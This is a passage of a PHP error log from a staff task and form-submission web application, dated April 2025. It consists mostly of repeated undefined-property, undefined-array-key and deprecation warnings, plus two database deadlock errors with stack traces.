Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 03:41:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 04:00:34 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 04:11:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:11:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 04:16:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:16:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 04:40:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:42:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:49:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 04:51:40 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 04:51:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 212 [07-Apr-2025 04:51:44 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 216 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 04:57:18 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 05:16:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:29:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:41:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:41:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:55:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 05:57:42 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 06:30:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 06:48:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 07:02:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Apr-2025 07:37:51 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Apr-2025 07:43:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 08:19:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 08:34:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 10:14:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 10:44:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 13:11:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 13:11:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Apr-2025 20:45:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 22:26:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 22:40:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Apr-2025 23:43:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 00:15:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 00:19:09 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:29:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:31:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:34:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 01:36:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 02:30:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 02:33:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 02:33:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 02:42:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:21:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:23:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:25:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 03:26:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 04:25:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 05:08:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 05:47:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 06:15:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 06:29:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 07:10:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 07:42:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 07:44:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 08:04:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 08:09:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 10:51:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 12:13:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 12:13:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Apr-2025 16:39:40 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Apr-2025 23:00:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 00:47:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 00:52:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 00:58:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 01:23:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 01:26:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 01:26:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 02:03:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 02:20:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 02:39:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:13:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:30:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:37:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:42:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 03:43:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 03:58:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 04:27:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 04:33:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 04:39:04 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Apr-2025 05:01:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:26:33 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:30:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:36:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 05:43:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 06:35:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 06:45:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 07:06:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 07:16:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Apr-2025 07:30:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 07:52:02 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Apr-2025 08:12:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 09:35:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 11:46:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 14:22:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 17:51:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 20:53:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Apr-2025 23:39:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 00:35:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 01:52:03 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 02:07:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 02:31:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:02:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:11:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:14:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:20:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:28:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 03:33:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 04:14:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 04:23:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 04:23:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 04:23:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [10-Apr-2025 05:10:13 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [10-Apr-2025 05:21:12 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:22:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:22:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:22:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:25:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:26:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:28:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:29:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:31:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 05:39:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:44:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:51:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 05:59:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 07:16:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 07:17:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 07:45:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 08:09:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 08:22:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 09:40:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 12:03:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 12:03:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 12:35:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 13:48:47 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 14:52:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 14:52:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 14:53:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 14:53:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 14:58:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 15:31:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Apr-2025 16:27:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Apr-2025 21:58:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 